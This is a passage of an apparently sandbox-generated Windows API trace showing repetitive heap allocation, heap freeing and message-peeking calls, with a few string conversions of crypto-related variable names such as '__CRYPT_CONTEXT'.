hHeap=0x970000) returned 1 [0227.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50dd0 [0227.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510a0 [0227.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51010 [0227.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0227.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0227.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0227.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0227.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0227.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0227.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0227.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0227.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0227.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0227.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0227.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0227.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f4e0 | out: hHeap=0x970000) returned 1 [0227.980] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0227.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0227.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0227.980] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0227.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0227.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04070 [0227.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0227.980] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0227.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04070 | out: hHeap=0x970000) returned 1 [0227.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0227.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d28 [0227.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0227.981] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0227.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0227.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0227.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0227.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0227.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0227.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0227.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0227.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0227.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0227.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0227.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0227.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0227.981] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0227.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0227.981] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0227.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0227.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0227.981] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0227.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0227.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0227.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0227.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0227.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0227.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0227.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0227.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0227.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0227.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0227.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0227.982] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0227.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0227.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0227.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0227.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0227.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0227.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0227.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0227.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0227.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0227.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0227.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0227.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0227.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0227.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0227.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0227.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0227.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0227.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0227.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0227.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0227.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0227.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f350 | out: hHeap=0x970000) returned 1 [0227.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0227.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6e8 | out: hHeap=0x970000) returned 1 [0227.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0227.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5f8 | out: hHeap=0x970000) returned 1 [0227.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0227.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0227.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0227.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0227.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0227.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0227.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0227.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0227.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f710 | out: hHeap=0x970000) returned 1 [0227.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0227.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0227.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0227.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0227.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0227.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0227.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0227.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0227.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0227.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0227.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0227.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0227.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f558 | out: hHeap=0x970000) returned 1 [0227.984] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0227.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f800 [0227.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0227.984] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0227.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f800 | out: hHeap=0x970000) returned 1 [0227.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0227.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50de8 [0227.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0227.984] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0227.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f045e8 [0227.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0227.984] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0227.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f045e8 | out: hHeap=0x970000) returned 1 [0227.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0227.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e00 [0227.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0227.984] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0227.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0227.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0227.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0227.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0227.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0227.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0227.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0227.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0227.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0227.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d40 [0227.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0227.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e78 [0227.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ec0 [0227.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ce0 [0227.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f4e0 [0227.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0227.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f20 [0227.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50cc8 [0227.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f80 [0227.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0227.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0227.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0227.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0227.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0227.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0227.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0227.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0227.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0227.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0227.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0227.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0227.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f4e0 | out: hHeap=0x970000) returned 1 [0227.986] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0227.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0227.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0227.986] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0227.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0227.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04230 [0227.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0227.986] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0227.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04230 | out: hHeap=0x970000) returned 1 [0227.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0227.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50cf8 [0227.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0227.986] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0227.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0227.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0227.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0227.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0227.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0227.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0227.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0227.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0227.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0227.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0227.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0227.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0227.986] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0227.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0227.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0227.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0227.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04070 [0227.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0227.987] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0227.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04070 | out: hHeap=0x970000) returned 1 [0227.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0227.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d70 [0227.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0227.987] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0227.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0227.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0227.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0227.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0227.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0227.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0227.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0227.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0227.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0227.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0227.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0227.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0227.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0227.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0227.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0227.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0227.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0227.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0227.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0227.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f710 [0227.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0227.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0227.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0227.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f580 [0227.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0227.988] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0227.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f580 | out: hHeap=0x970000) returned 1 [0227.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0227.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50da0 [0227.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0227.988] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0227.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0227.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0227.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0227.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0227.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0227.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0227.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0227.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0227.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0227.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0227.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) 